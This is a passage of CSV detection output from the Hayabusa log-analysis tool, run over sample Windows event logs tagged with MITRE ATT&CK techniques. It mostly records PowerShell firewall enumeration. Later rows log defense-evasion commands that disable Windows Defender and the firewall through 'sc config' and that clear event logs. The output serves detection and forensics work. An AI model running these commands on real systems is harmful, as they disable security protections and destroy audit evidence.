[System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['Action'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Action'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]($this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]($this.PSBase.CimInstanceProperties['PrimaryStatus'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PrimaryStatus'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""Status""].Value + "" ("" + ($this.PSBase.CimInstanceProperties[""StatusCode""].Value + 0) + "")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Microsoft.Windows.Firewall.Commands.Formatting.Formatter]::FormatEnforcementStatus($this.PSBase.CimInstanceProperties[""EnforcementStatus""].Value)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]($this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:12.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayName""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Description""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayGroup""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Group""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Enabled""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Direction""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Action""; value="""" ParameterBinding(Get-NetFirewallRule): name=""EdgeTraversalPolicy""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LooseSourceMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LocalOnlyMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PrimaryStatus""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Status""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSource""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSourceType""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallAddressFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallApplicationFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceTypeFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallPortFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallSecurityFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallServiceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallProfile""; value="""" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False"" TerminatingError(): ""The pipeline has been stopped.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:12.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallSetting,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]($this.PSBase.CimInstanceProperties['Exemptions'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Exemptions'].Value = [System.Uint32][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profile'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profile'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]($this.PSBase.CimInstanceProperties['CertValidationLevel'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['CertValidationLevel'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]($this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().Equals(""0"")) { ""NotConfigured""; } else { $x.Value }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = 0; } else { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = [uint32]$x; }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]($this.PSBase.CimInstanceProperties['KeyEncoding'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['KeyEncoding'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]($this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallSetting): ""Get-NetFirewallSetting"" ParameterBinding(Get-NetFirewallSetting): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallSetting): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallSetting): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetSecuritySettingData (InstanceID = ""MSFT?GlobalIPSecSettingData"")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:57:04.361 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx 2021-10-25 16:57:05.977 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx 2021-10-25 16:57:08.463 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx 2021-10-26 03:04:24.089 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Clear-EventLog -LogName application, system -confirm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx 2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Clear-EventLog): ""Clear-EventLog"" ParameterBinding(Clear-EventLog): name=""LogName""; value=""application, system"" ParameterBinding(Clear-EventLog): name=""Confirm""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx 2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx 2021-10-26 03:04:30.350 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx 2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 